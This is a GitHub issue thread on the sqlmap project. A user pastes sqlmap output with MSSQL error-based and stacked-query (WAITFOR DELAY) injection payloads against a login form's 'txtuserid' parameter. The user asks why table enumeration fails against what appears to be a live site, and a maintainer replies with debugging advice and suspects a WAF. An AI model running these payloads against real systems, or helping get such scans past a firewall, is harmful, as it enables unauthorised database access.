### ISSUE TITLE
why sqlmap is not able to return me the table name ..plzz help me with error

### ISSUE THREAD

**Issue by amanyaa** [sqlmapproject/sqlmap#4097]
Parameter: txtuserid (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTQ1NDUwNDY5NmRkmbWzdr1D9b0iQIOFBNWx90YjSY0IXR0QtbTgDi/EeOI=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAASJPjp5YNwVOoMccY5Q5xAu8RS22m14wsypFtp/hwI9XQ9PSmWJ/Dfq4IC1PCatUxSinihG6d/Xh3PZm3b5AoMQyJdbj3JtICK8TLX/M8JpKsmw9N AVH37yrE8WYt2Se0=&txtuserid=123456') AND 5689 IN (SELECT (CHAR(113) CHAR(113) CHAR(120) CHAR(120) CHAR(113) (SELECT (CASE WHEN (5689=5689) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(113) CHAR(122) CHAR(107) CHAR(113)))-- JiTm&txtpass=bumbum&btnLogin=Sign in

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __LASTFOCUS=&__VIEWSTATE=/wEPDwUKLTQ1NDUwNDY5NmRkmbWzdr1D9b0iQIOFBNWx90YjSY0IXR0QtbTgDi/EeOI=&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTTARGET=&__EVENTARGUMENT=&__EVENTVALIDATION=/wEdAASJPjp5YNwVOoMccY5Q5xAu8RS22m14wsypFtp/hwI9XQ9PSmWJ/Dfq4IC1PCatUxSinihG6d/Xh3PZm3b5AoMQyJdbj3JtICK8TLX/M8JpKsmw9N AVH37yrE8WYt2Se0=&txtuserid=123456');WAITFOR DELAY '0:0:2'--&txtpass=bumbum&btnLogin=Sign in
---
[02:25:34] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[02:25:34] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 10 or 2016
web application technology: ASP.NET 4.0.30319, Microsoft IIS 10.0, ASP.NET
back-end DBMS: Microsoft SQL Server 2016
[02:25:34] [INFO] fetching tables for database: wrtdb
[02:25:35] [WARNING] the SQL query provided does not return any output
[02:25:35] [WARNING] turning off pre-connect mechanism because of connection reset(s)
[02:25:35] [CRITICAL] connection reset to the target URL. sqlmap is going to retry the request(s)
[02:25:35] [CRITICAL] connection reset to the target URL
[02:25:35] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times

[*] ending @ 02:25:35 /2020-02-01/

**Comment by stamparm** [comment]
1) Please do the proper debugging at your own side. Try with `-t traffic.txt --parse-errors`
2) You are using tamper scripts, hence, I guess that you have a WAF/IPS there (which you forgot to mention). Not sure why are you raising this kind of Issues here then when you know the answer. If there is not WAF/IPS, then I am not sure why are you using tamper scripts in the first place

Anyway, do a proper debugging as said in 1)
